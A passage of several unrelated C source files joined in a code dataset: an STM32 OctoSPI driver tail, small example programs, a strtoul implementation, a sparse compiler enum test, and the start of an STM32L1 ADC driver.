HAL_OSPI_ADDRESS_4_LINES; break; case OSPI_CFG_BUS_OCTA: case OSPI_CFG_BUS_OCTA_DTR: st_command->AddressMode = HAL_OSPI_ADDRESS_8_LINES; break; default: error("Command param error: wrong address size\n"); return OSPI_STATUS_ERROR; } switch (command->address.size) { case OSPI_CFG_ADDR_SIZE_8: st_command->AddressSize = HAL_OSPI_ADDRESS_8_BITS; break; case OSPI_CFG_ADDR_SIZE_16: st_command->AddressSize = HAL_OSPI_ADDRESS_16_BITS; break; case OSPI_CFG_ADDR_SIZE_24: st_command->AddressSize = HAL_OSPI_ADDRESS_24_BITS; break; case OSPI_CFG_ADDR_SIZE_32: st_command->AddressSize = HAL_OSPI_ADDRESS_32_BITS; break; default: error("Command param error: wrong address size\n"); return OSPI_STATUS_ERROR; } } if (command->alt.disabled == true) { st_command->AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_NONE; st_command->AlternateBytesSize = 0; } else { uint8_t alt_lines = 0; switch (command->alt.bus_width) { case OSPI_CFG_BUS_SINGLE: st_command->AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_1_LINE; alt_lines = 1; break; case OSPI_CFG_BUS_DUAL: st_command->AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_2_LINES; alt_lines = 2; break; case OSPI_CFG_BUS_QUAD: st_command->AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_4_LINES; alt_lines = 4; break; case OSPI_CFG_BUS_OCTA: case OSPI_CFG_BUS_OCTA_DTR: st_command->AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_8_LINES; alt_lines = 8; break; default: st_command->AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_NONE; error("Command param error: invalid alt bytes mode\n"); return OSPI_STATUS_ERROR; } // Alt size must be a multiple of the number of bus lines used (i.e. a whole number of cycles) if (command->alt.size % alt_lines != 0) { error("Command param error: incompatible alt size and alt bus width\n"); return OSPI_STATUS_ERROR; } // Round up to nearest byte - unused parts of byte act as dummy cycles uint32_t alt_bytes = ((command->alt.size - 1) >> 3) + 1; // Maximum of 4 alt bytes if (alt_bytes > 4) { error("Command param error: alt size exceeds maximum of 32 bits\n"); return OSPI_STATUS_ERROR; } // Unused bits in most significant byte of alt uint8_t leftover_bits = (alt_bytes << 3) - command->alt.size; if (leftover_bits != 0) { // Account for dummy cycles that will be spent in the alt portion of the command uint8_t integrated_dummy_cycles = leftover_bits / alt_lines; if (st_command->DummyCycles < integrated_dummy_cycles) { // Not enough dummy cycles to account for a short alt error("Command param error: not enough dummy cycles to make up for given alt size\n"); return OSPI_STATUS_ERROR; } st_command->DummyCycles -= integrated_dummy_cycles; // Align alt value to the end of the most significant byte st_command->AlternateBytes = command->alt.value << leftover_bits; } else { st_command->AlternateBytes = command->alt.value; } st_command->AlternateBytesSize = get_alt_bytes_size(alt_bytes); } switch (command->data.bus_width) { case OSPI_CFG_BUS_SINGLE: st_command->DataMode = HAL_OSPI_DATA_1_LINE; break; case OSPI_CFG_BUS_DUAL: st_command->DataMode = HAL_OSPI_DATA_2_LINES; break; case OSPI_CFG_BUS_QUAD: st_command->DataMode = HAL_OSPI_DATA_4_LINES; break; case OSPI_CFG_BUS_OCTA: case OSPI_CFG_BUS_OCTA_DTR: st_command->DataMode = HAL_OSPI_DATA_8_LINES; break; default: st_command->DataMode = HAL_OSPI_DATA_NONE; break; } debug_if(ospi_api_c_debug, "ospi_prepare_command Out: InstructionMode %x Instruction %x AddressMode %x AddressSize %x Address %x DataMode %x\n", st_command->InstructionMode, st_command->Instruction, st_command->AddressMode, st_command->AddressSize, st_command->Address, st_command->DataMode); return OSPI_STATUS_OK; } #if STATIC_PINMAP_READY #define OSPI_INIT_DIRECT ospi_init_direct ospi_status_t ospi_init_direct(ospi_t *obj, const ospi_pinmap_t *pinmap, uint32_t hz, uint8_t mode) #else #define OSPI_INIT_DIRECT _ospi_init_direct static ospi_status_t _ospi_init_direct(ospi_t *obj, const ospi_pinmap_t *pinmap, uint32_t hz, uint8_t mode) #endif { tr_debug("ospi_init mode %u", mode); // Reset handle internal state obj->handle.State = HAL_OSPI_STATE_RESET; // Set default OCTOSPI handle values obj->handle.Init.DualQuad = HAL_OSPI_DUALQUAD_DISABLE; //#if defined(TARGET_MX25LM512451G) // obj->handle.Init.MemoryType = HAL_OSPI_MEMTYPE_MACRONIX; // Read sequence in DTR mode: D1-D0-D3-D2 //#else obj->handle.Init.MemoryType = HAL_OSPI_MEMTYPE_MICRON; // Read sequence in DTR mode: D0-D1-D2-D3 //#endif obj->handle.Init.ClockPrescaler = 4; // default value, will be overwritten in ospi_frequency obj->handle.Init.FifoThreshold = 4; obj->handle.Init.SampleShifting = HAL_OSPI_SAMPLE_SHIFTING_NONE; obj->handle.Init.DeviceSize = 32; obj->handle.Init.ChipSelectHighTime = 3; obj->handle.Init.FreeRunningClock = HAL_OSPI_FREERUNCLK_DISABLE; #if defined(HAL_OSPI_WRAP_NOT_SUPPORTED) // removed in STM32L4 obj->handle.Init.WrapSize = HAL_OSPI_WRAP_NOT_SUPPORTED; #endif obj->handle.Init.ClockMode = mode == 0 ? HAL_OSPI_CLOCK_MODE_0 : HAL_OSPI_CLOCK_MODE_3; obj->handle.Init.DelayHoldQuarterCycle = HAL_OSPI_DHQC_ENABLE; obj->handle.Init.ChipSelectBoundary = 0; #if defined(HAL_OSPI_DELAY_BLOCK_USED) // STM32L5 obj->handle.Init.DelayBlockBypass = HAL_OSPI_DELAY_BLOCK_USED; #endif #if defined(TARGET_STM32L5) obj->handle.Init.Refresh = 0; #endif // tested all combinations, take first obj->ospi = pinmap->peripheral; #if defined(OCTOSPI1) if (obj->ospi == OSPI_1) { obj->handle.Instance = OCTOSPI1; } #endif #if defined(OCTOSPI2) if (obj->ospi == OSPI_2) { obj->handle.Instance = OCTOSPI2; } #endif #if defined(OCTOSPI1) if (obj->ospi == OSPI_1) { __HAL_RCC_OSPI1_CLK_ENABLE(); __HAL_RCC_OSPI1_FORCE_RESET(); __HAL_RCC_OSPI1_RELEASE_RESET(); } #endif #if defined(OCTOSPI2) if (obj->ospi == OSPI_2) { __HAL_RCC_OSPI2_CLK_ENABLE(); __HAL_RCC_OSPI2_FORCE_RESET(); __HAL_RCC_OSPI2_RELEASE_RESET(); } #endif // pinmap for pins (enable clock) obj->io0 = pinmap->data0_pin; pin_function(pinmap->data0_pin, pinmap->data0_function); pin_mode(pinmap->data0_pin, PullNone); obj->io1 = pinmap->data1_pin; pin_function(pinmap->data1_pin, pinmap->data1_function); pin_mode(pinmap->data1_pin, PullNone); obj->io2 = pinmap->data2_pin; pin_function(pinmap->data2_pin, pinmap->data2_function); pin_mode(pinmap->data2_pin, PullNone); obj->io3 = pinmap->data3_pin; pin_function(pinmap->data3_pin, pinmap->data3_function); pin_mode(pinmap->data3_pin, PullNone); obj->io4 = pinmap->data4_pin; pin_function(pinmap->data4_pin, pinmap->data4_function); pin_mode(pinmap->data4_pin, PullNone); obj->io5 = pinmap->data5_pin; pin_function(pinmap->data5_pin, pinmap->data5_function); pin_mode(pinmap->data5_pin, PullNone); obj->io6 = pinmap->data6_pin; pin_function(pinmap->data6_pin, pinmap->data6_function); pin_mode(pinmap->data6_pin, PullNone); obj->io7 = pinmap->data7_pin; pin_function(pinmap->data7_pin, pinmap->data7_function); pin_mode(pinmap->data7_pin, PullNone); obj->sclk = pinmap->sclk_pin; pin_function(pinmap->sclk_pin, pinmap->sclk_function); pin_mode(pinmap->sclk_pin, PullNone); obj->ssel = pinmap->ssel_pin; pin_function(pinmap->ssel_pin, pinmap->ssel_function); pin_mode(pinmap->ssel_pin, PullNone); obj->dqs = pinmap->dqs_pin; pin_function(pinmap->dqs_pin, pinmap->dqs_function); pin_mode(pinmap->dqs_pin, PullNone); #if defined(OCTOSPI2) __HAL_RCC_OSPIM_CLK_ENABLE(); OSPIM_CfgTypeDef OSPIM_Cfg_Struct = {0}; /* The OctoSPI IO Manager OCTOSPIM configuration is supported in a simplified mode in mbed-os * OSPI1 signals are mapped to port 1 and OSPI2 signals are mapped to port 2. * This is coded in this way in PeripheralPins.c */ if (obj->ospi == OSPI_1) { OSPIM_Cfg_Struct.ClkPort = 1; OSPIM_Cfg_Struct.DQSPort = 1; OSPIM_Cfg_Struct.NCSPort = 1; OSPIM_Cfg_Struct.IOLowPort = HAL_OSPIM_IOPORT_1_LOW; OSPIM_Cfg_Struct.IOHighPort = HAL_OSPIM_IOPORT_1_HIGH; } else { OSPIM_Cfg_Struct.ClkPort = 2; OSPIM_Cfg_Struct.DQSPort = 2; OSPIM_Cfg_Struct.NCSPort = 2; OSPIM_Cfg_Struct.IOLowPort = HAL_OSPIM_IOPORT_2_LOW; OSPIM_Cfg_Struct.IOHighPort = HAL_OSPIM_IOPORT_2_HIGH; } if (HAL_OSPIM_Config(&obj->handle, &OSPIM_Cfg_Struct, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) { tr_error("HAL_OSPIM_Config error"); return OSPI_STATUS_ERROR; } #endif return ospi_frequency(obj, hz); } ospi_status_t ospi_init(ospi_t *obj, PinName io0, PinName io1, PinName io2, PinName io3, PinName io4, PinName io5, PinName io6, PinName io7, PinName sclk, PinName ssel, PinName dqs, uint32_t hz, uint8_t mode) { OSPIName ospiio0name = (OSPIName)pinmap_peripheral(io0, PinMap_OSPI_DATA0); OSPIName ospiio1name = (OSPIName)pinmap_peripheral(io1, PinMap_OSPI_DATA1); OSPIName ospiio2name = (OSPIName)pinmap_peripheral(io2, PinMap_OSPI_DATA2); OSPIName ospiio3name = (OSPIName)pinmap_peripheral(io3, PinMap_OSPI_DATA3); OSPIName ospiio4name = (OSPIName)pinmap_peripheral(io4, PinMap_OSPI_DATA4); OSPIName ospiio5name = (OSPIName)pinmap_peripheral(io5, PinMap_OSPI_DATA5); OSPIName ospiio6name = (OSPIName)pinmap_peripheral(io6, PinMap_OSPI_DATA6); OSPIName ospiio7name = (OSPIName)pinmap_peripheral(io7, PinMap_OSPI_DATA7); OSPIName ospiclkname = (OSPIName)pinmap_peripheral(sclk, PinMap_OSPI_SCLK); OSPIName ospisselname = (OSPIName)pinmap_peripheral(ssel, PinMap_OSPI_SSEL); OSPIName ospidqsname = (OSPIName)pinmap_peripheral(dqs, PinMap_OSPI_DQS); OSPIName ospi_data_first = (OSPIName)pinmap_merge(ospiio0name, ospiio1name); OSPIName ospi_data_second = (OSPIName)pinmap_merge(ospiio2name, ospiio3name); OSPIName ospi_data_third = (OSPIName)pinmap_merge(ospiclkname, ospisselname); if (ospi_data_first != ospi_data_second || ospi_data_second != ospi_data_third || ospi_data_first != ospi_data_third) { return OSPI_STATUS_INVALID_PARAMETER; } int peripheral = (int)ospi_data_first; int function_io0 = (int)pinmap_find_function(io0, PinMap_OSPI_DATA0); int function_io1 = (int)pinmap_find_function(io1, PinMap_OSPI_DATA1); int function_io2 = (int)pinmap_find_function(io2, PinMap_OSPI_DATA2); int function_io3 = (int)pinmap_find_function(io3, PinMap_OSPI_DATA3); int function_io4 = (int)pinmap_find_function(io4, PinMap_OSPI_DATA4); int function_io5 = (int)pinmap_find_function(io5, PinMap_OSPI_DATA5); int function_io6 = (int)pinmap_find_function(io6, PinMap_OSPI_DATA6); int function_io7 = (int)pinmap_find_function(io7, PinMap_OSPI_DATA7); int function_sclk = (int)pinmap_find_function(sclk, PinMap_OSPI_SCLK); int function_ssel = (int)pinmap_find_function(ssel, PinMap_OSPI_SSEL); int function_dqs = (int)pinmap_find_function(dqs, PinMap_OSPI_DQS); const ospi_pinmap_t static_pinmap = {peripheral, io0, function_io0, io1, function_io1, io2, function_io2, io3, function_io3, io4, function_io4, io5, function_io5, io6, function_io6, io7, function_io7, sclk, function_sclk, ssel, function_ssel, dqs, function_dqs }; return OSPI_INIT_DIRECT(obj, &static_pinmap, hz, mode); } ospi_status_t ospi_free(ospi_t *obj) { tr_debug("ospi_free"); if (HAL_OSPI_DeInit(&obj->handle) != HAL_OK) { return OSPI_STATUS_ERROR; } #if defined(OCTOSPI1) if (obj->ospi == OSPI_1) { __HAL_RCC_OSPI1_FORCE_RESET(); __HAL_RCC_OSPI1_CLK_DISABLE(); } #endif #if defined(OCTOSPI2) if (obj->ospi == OSPI_2) { __HAL_RCC_OSPI2_FORCE_RESET(); __HAL_RCC_OSPI2_CLK_DISABLE(); } #endif // Configure GPIOs back to reset value pin_function(obj->io0, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io1, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io2, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io3, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io4, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io5, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io6, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->io7, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->sclk, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->ssel, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); pin_function(obj->dqs, STM_PIN_DATA(STM_MODE_ANALOG, GPIO_NOPULL, 0)); (void)(obj); return OSPI_STATUS_OK; } ospi_status_t ospi_frequency(ospi_t *obj, int hz) { tr_debug("ospi_frequency hz %d", hz); ospi_status_t status = OSPI_STATUS_OK; /* HCLK drives OSPI. OSPI clock depends on prescaler value: * 0: Freq = HCLK * 1: Freq = HCLK/2 * ... * 255: Freq = HCLK/256 (minimum value) */ int div = HAL_RCC_GetHCLKFreq() / hz; if (div > 255) { div = 255; } else { if (div == 1) { div = div + 1; } } obj->handle.Init.ClockPrescaler = div; if (HAL_OSPI_Init(&obj->handle) != HAL_OK) { tr_error("HAL_OSPI_Init error"); status = OSPI_STATUS_ERROR; } return status; } ospi_status_t ospi_write(ospi_t *obj, const ospi_command_t *command, const void *data, size_t *length) { debug_if(ospi_api_c_debug, "ospi_write size %u\n", *length); OSPI_RegularCmdTypeDef st_command; ospi_status_t status = ospi_prepare_command(command, &st_command); if (status != OSPI_STATUS_OK) { return status; } st_command.NbData = *length; if (HAL_OSPI_Command(&obj->handle, &st_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) { tr_error("HAL_OSPI_Command error"); status = OSPI_STATUS_ERROR; } else { if (HAL_OSPI_Transmit(&obj->handle, (uint8_t *)data, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) { tr_error("HAL_OSPI_Transmit error"); status = OSPI_STATUS_ERROR; } } return status; } ospi_status_t ospi_read(ospi_t *obj, const ospi_command_t *command, void *data, size_t *length) { OSPI_RegularCmdTypeDef st_command; ospi_status_t status = ospi_prepare_command(command, &st_command); if (status != OSPI_STATUS_OK) { return status; } st_command.NbData = *length; if (HAL_OSPI_Command(&obj->handle, &st_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) { tr_error("HAL_OSPI_Command error"); status = OSPI_STATUS_ERROR; } else { if (HAL_OSPI_Receive(&obj->handle, data, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) { tr_error("HAL_OSPI_Receive error %d", obj->handle.ErrorCode); status = OSPI_STATUS_ERROR; } } debug_if(ospi_api_c_debug, "ospi_read size %u\n", *length); return status; } ospi_status_t ospi_command_transfer(ospi_t *obj, const ospi_command_t *command, const void *tx_data, size_t tx_size, void *rx_data, size_t rx_size) { tr_debug("ospi_command_transfer tx %u rx %u command %#04x", tx_size, rx_size, command->instruction.value); ospi_status_t status = OSPI_STATUS_OK; if ((tx_data == NULL || tx_size == 0) && (rx_data == NULL || rx_size == 0)) { // only command, no rx or tx OSPI_RegularCmdTypeDef st_command; status = ospi_prepare_command(command, &st_command); if (status != OSPI_STATUS_OK) { return status; } st_command.NbData = 1; st_command.DataMode = HAL_OSPI_DATA_NONE; /* Instruction only */ if (HAL_OSPI_Command(&obj->handle, &st_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) { status = OSPI_STATUS_ERROR; tr_error("HAL_OSPI_Command error"); return status; } } else { // often just read a register, check if we need to transmit anything prior reading if (tx_data != NULL && tx_size) { size_t tx_length = tx_size; status = ospi_write(obj, command, tx_data, &tx_length); if (status != OSPI_STATUS_OK) { tr_error("qspi_write error"); return status; } } if (rx_data != NULL && rx_size) { size_t rx_length = rx_size; status = ospi_read(obj, command, rx_data, &rx_length); } } return status; } const PinMap *ospi_master_sclk_pinmap() { return PinMap_OSPI_SCLK; } const PinMap *ospi_master_ssel_pinmap() { return PinMap_OSPI_SSEL; } const PinMap *ospi_master_dqs_pinmap() { return PinMap_OSPI_DQS; } const PinMap *ospi_master_data0_pinmap() { return PinMap_OSPI_DATA0; } const PinMap *ospi_master_data1_pinmap() { return PinMap_OSPI_DATA1; } const PinMap *ospi_master_data2_pinmap() { return PinMap_OSPI_DATA2; } const PinMap *ospi_master_data3_pinmap() { return PinMap_OSPI_DATA3; } const PinMap *ospi_master_data4_pinmap() { return PinMap_OSPI_DATA4; } const PinMap *ospi_master_data5_pinmap() { return PinMap_OSPI_DATA5; } const PinMap *ospi_master_data6_pinmap() { return PinMap_OSPI_DATA6; } const PinMap *ospi_master_data7_pinmap() { return PinMap_OSPI_DATA7; } #endif /** @}*/
the_stack_data/92328777.c
/* 1 01 101 0101 */ #include<stdio.h> int main() { while(1) { int col, row, n; printf("\nEnter N: "); scanf("%d", &n); for(row=1; row<=n; row++) { //printing space for(col=1; col<=n-row; col++) { printf(" ", col); } //printing number for(col=1; col<=row; col++) { printf("%d", col); } printf("\n"); } } return 0; }
the_stack_data/181392620.c
#include <stdio.h> extern int print(); int print() { printf("Hello World\n"); return 0; }
the_stack_data/182952498.c
/* * Australian Public Licence B (OZPLB) * * Version 1-0 * * Copyright (c) 2004 National ICT Australia * * All rights reserved. * * Developed by: Embedded, Real-time and Operating Systems Program (ERTOS) * National ICT Australia * http://www.ertos.nicta.com.au * * Permission is granted by National ICT Australia, free of charge, to * any person obtaining a copy of this software and any associated * documentation files (the "Software") to deal with the Software without * restriction, including (without limitation) the rights to use, copy, * modify, adapt, merge, publish, distribute, communicate to the public, * sublicense, and/or sell, lend or rent out copies of the Software, and * to permit persons to whom the Software is furnished to do so, subject * to the following conditions: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimers. * * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimers in the documentation and/or other materials provided * with the distribution. * * * Neither the name of National ICT Australia, nor the names of its * contributors, may be used to endorse or promote products derived * from this Software without specific prior written permission. * * EXCEPT AS EXPRESSLY STATED IN THIS LICENCE AND TO THE FULL EXTENT * PERMITTED BY APPLICABLE LAW, THE SOFTWARE IS PROVIDED "AS-IS", AND * NATIONAL ICT AUSTRALIA AND ITS CONTRIBUTORS MAKE NO REPRESENTATIONS, * WARRANTIES OR CONDITIONS OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING * BUT NOT LIMITED TO ANY REPRESENTATIONS, WARRANTIES OR CONDITIONS * REGARDING THE CONTENTS OR ACCURACY OF THE SOFTWARE, OR OF TITLE, * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, * THE ABSENCE OF LATENT OR OTHER DEFECTS, OR THE PRESENCE OR ABSENCE OF * ERRORS, WHETHER OR NOT DISCOVERABLE. * * TO THE FULL EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT SHALL * NATIONAL ICT AUSTRALIA OR ITS CONTRIBUTORS BE LIABLE ON ANY LEGAL * THEORY (INCLUDING, WITHOUT LIMITATION, IN AN ACTION OF CONTRACT, * NEGLIGENCE OR OTHERWISE) FOR ANY CLAIM, LOSS, DAMAGES OR OTHER * LIABILITY, INCLUDING (WITHOUT LIMITATION) LOSS OF PRODUCTION OR * OPERATION TIME, LOSS, DAMAGE OR CORRUPTION OF DATA OR RECORDS; OR LOSS * OF ANTICIPATED SAVINGS, OPPORTUNITY, REVENUE, PROFIT OR GOODWILL, OR * OTHER ECONOMIC LOSS; OR ANY SPECIAL, INCIDENTAL, INDIRECT, * CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES, ARISING OUT OF OR IN * CONNECTION WITH THIS LICENCE, THE SOFTWARE OR THE USE OF OR OTHER * DEALINGS WITH THE SOFTWARE, EVEN IF NATIONAL ICT AUSTRALIA OR ITS * CONTRIBUTORS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH CLAIM, LOSS, * DAMAGES OR OTHER LIABILITY. * * If applicable legislation implies representations, warranties, or * conditions, or imposes obligations or liability on National ICT * Australia or one of its contributors in respect of the Software that * cannot be wholly or partly excluded, restricted or modified, the * liability of National ICT Australia or the contributor is limited, to * the full extent permitted by the applicable legislation, at its * option, to: * a. in the case of goods, any one or more of the following: * i. the replacement of the goods or the supply of equivalent goods; * ii. the repair of the goods; * iii. the payment of the cost of replacing the goods or of acquiring * equivalent goods; * iv. the payment of the cost of having the goods repaired; or * b. in the case of services: * i. the supplying of the services again; or * ii. the payment of the cost of having the services supplied again. * * The construction, validity and performance of this licence is governed * by the laws in force in New South Wales, Australia. */ /* Author: Ben Leslie Created: Fri Oct 8 2004 */ #include <stdlib.h> #include <stdbool.h> #include <ctype.h> #include <stdio.h> #include <assert.h> /** * Work out the numeric value of a char, assuming up to base 36 * * @param ch The character to decode * * \return Numeric value of character, or 37 on failure */ static inline unsigned short char_value(char ch) { if (ch >= '0' && ch <= '9') { return ch - '0'; } if (ch >= 'a' && ch <= 'z') { return ch - 'a' + 10; } if (ch >= 'A' && ch <= 'Z') { return ch - 'A' + 10; } return 37; } unsigned long int strtoul(const char *nptr, char **endptr, int base) { /* Decompose input info thread parts: - inital list of whitespace (as per isspace) - subject sequence - final string one or more unrecognized */ const char *ptr = nptr; bool negative = false; unsigned int value; long int return_value = 0; /* Remove spaces */ while(*ptr != '\0') { if (! isspace(*ptr)) { break; } ptr++; } if (*ptr == '\0') goto fail; /* check [+|-] */ if (*ptr == '+') { ptr++; } else if (*ptr == '-') { negative = true; ptr++; } if (*ptr == '\0') goto fail; if (base == 16) { /* _May_ have 0x prefix */ if (*ptr == '0') { ptr++; if (*ptr == 'x' || *ptr == 'X') { ptr++; } } } /* [0(x|X)+] */ if (base == 0) { /* Could be hex or octal or decimal */ if (*ptr != '0') { base = 10; } else { ptr++; if (ptr == '\0') goto fail; if (*ptr == 'x' || *ptr == 'X') { base = 16; ptr++; } else { base = 8; } } } if (*ptr == '\0') goto fail; /* Ok, here we have a base, and we might have a valid number */ value = char_value(*ptr); if (value >= base) { goto fail; } else { return_value = value; ptr++; } while (*ptr != '\0' && (value = char_value(*ptr)) < base) { return_value = return_value * base + value; ptr++; } if (endptr != NULL) *endptr = (char*) ptr; if (negative) { return_value *= -1; } return return_value; /* if base is 0, then we work it out based on a couple of things */ /* [+|-][0(x|X)+][0-9A-Za-z] not LL * */ /* endptr == final string */ fail: if (endptr != NULL) *endptr = (char*) nptr; return 0; }
the_stack_data/135659.c
/* * This software is copyrighted as noted below. It may be freely copied, * modified, and redistributed, provided that the copyright notice is * preserved on all copies. * * There is no warranty or other guarantee of fitness for this software, * it is provided solely "as is". Bug reports or fixes may be sent * to the author, who may or may not act on them as he desires. * * You may not include this software in a program or other software product * without supplying the source, or without informing the end-user that the * source is available for no extra charge. * * If you modify this software, you should include a notice giving the * name of the person performing the modification, the date of modification, * and the reason for such modification. */ /* * cmd_name.c - Extract command name from argv[0]. * * Author: Spencer W. Thomas * EECS Dept. * University of Michigan * Date: Wed Jun 27 1990 * Copyright (c) 1990, University of Michigan */ static char no_name[] = "(no-name)"; char * cmd_name( argv ) char **argv; { register char *cp, *a; /* Be paranoid. */ if ( !argv || !(a = *argv) ) return no_name; /* Find end of file name. */ for ( cp = a; *cp; cp++ ) ; /* Find last / or beginning of command name. */ for ( cp--; *cp != '/' && cp > a; cp-- ) ; /* If it's a /, skip it. */ if ( *cp == '/' ) cp++; return cp; }
the_stack_data/36076654.c
// For enum's underlying/compatible type: // std C: unspecified // GCC: 'unsigned int' if no negative values, // otherwise 'int' (see GCC manul 4.9). // But also accept ulong, long // For the type of the enumerators: // std C: 'int' // GCC: 'int' if the value fit in a 'int' // otherwise same as the enum underlying type? // // The following tests match GCC's choices #define is_unsigned(X) ((typeof(X))-1 > 0) enum u { U = 1U, // fit in 'int' // no negatives }; _Static_assert(sizeof(enum u) == sizeof(int), "size"); _Static_assert(is_unsigned(enum u), "enum u"); _Static_assert(is_unsigned(U) == 0, "value U"); // fail enum v { V = __INT_MAX__ + 1U, // doesn't fit in 'int' // no negatives }; _Static_assert(sizeof(enum v) == sizeof(int), "size"); _Static_assert(is_unsigned(enum v), "enum v"); _Static_assert(is_unsigned(V) == 1, "value V"); enum w { W = __LONG_MAX__ + 1UL, // doesn't fit in 'long' }; _Static_assert(sizeof(enum w) == sizeof(long), "size"); _Static_assert(is_unsigned(enum w), "enum w"); _Static_assert(is_unsigned(W) == 1, "value W"); enum x { A = 1, // fit in 'int' B = 0x100000000UL, // doesn't fit in int }; _Static_assert(sizeof(enum x) == sizeof(long), "size"); _Static_assert(is_unsigned(enum x), "enum x"); _Static_assert(sizeof(A) == sizeof(int), "size A"); // fail _Static_assert(is_unsigned(A) == 0, "enum A"); // fail _Static_assert(sizeof(B) == sizeof(long), "size B"); _Static_assert(is_unsigned(B) == 1, "enum B"); enum y { C = 1, // fit in 'int' D = 0x100000000L, // doesn't fit in int }; _Static_assert(sizeof(enum y) == sizeof(long), "size"); _Static_assert(is_unsigned(enum y), "enum y"); _Static_assert(sizeof(C) == sizeof(int), "size C"); // fail _Static_assert(is_unsigned(C) == 0, "enum C"); // fail _Static_assert(sizeof(D) == sizeof(long), "size D"); _Static_assert(is_unsigned(D) == 1, "enum D"); /* * check-name: enum-sign-gcc * check-command: sparse -m64 $file * check-assert: sizeof(long) == 8 */
the_stack_data/200142506.c
/** ****************************************************************************** * @file stm32l1xx_ll_adc.c * @author MCD Application Team * @brief ADC LL module driver ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2017 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ #if defined(USE_FULL_LL_DRIVER) /* Includes ------------------------------------------------------------------*/ #include "stm32l1xx_ll_adc.h" #include "stm32l1xx_ll_bus.h" #ifdef USE_FULL_ASSERT #include "stm32_assert.h" #else #define assert_param(expr) ((void)0U) #endif /** @addtogroup STM32L1xx_LL_Driver * @{ */ #if defined (ADC1) /** @addtogroup ADC_LL ADC * @{ */ /* Private types -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private constants ---------------------------------------------------------*/ /* Private macros ------------------------------------------------------------*/ /** @addtogroup ADC_LL_Private_Macros * @{ */ /* Check of parameters for configuration of ADC hierarchical scope: */ /* common to several ADC instances. */ #define IS_LL_ADC_COMMON_CLOCK(__CLOCK__) \ ( ((__CLOCK__) == LL_ADC_CLOCK_ASYNC_DIV1) \ || ((__CLOCK__) == LL_ADC_CLOCK_ASYNC_DIV2) \ || ((__CLOCK__) == LL_ADC_CLOCK_ASYNC_DIV4) \ ) /* Check of parameters for configuration of ADC hierarchical scope: */ /* ADC instance. */ #define IS_LL_ADC_RESOLUTION(__RESOLUTION__) \ ( ((__RESOLUTION__) == LL_ADC_RESOLUTION_12B) \ || ((__RESOLUTION__) == LL_ADC_RESOLUTION_10B) \ || ((__RESOLUTION__) == LL_ADC_RESOLUTION_8B) \ || ((__RESOLUTION__) == LL_ADC_RESOLUTION_6B) \ ) #define IS_LL_ADC_DATA_ALIGN(__DATA_ALIGN__) \ ( ((__DATA_ALIGN__) == LL_ADC_DATA_ALIGN_RIGHT) \ || ((__DATA_ALIGN__) == LL_ADC_DATA_ALIGN_LEFT) \ ) #define IS_LL_ADC_LOW_POWER_AUTOWAIT(__LOW_POWER__) \ ( ((__LOW_POWER__) == LL_ADC_LP_AUTOWAIT_NONE) \ || ((__LOW_POWER__) == 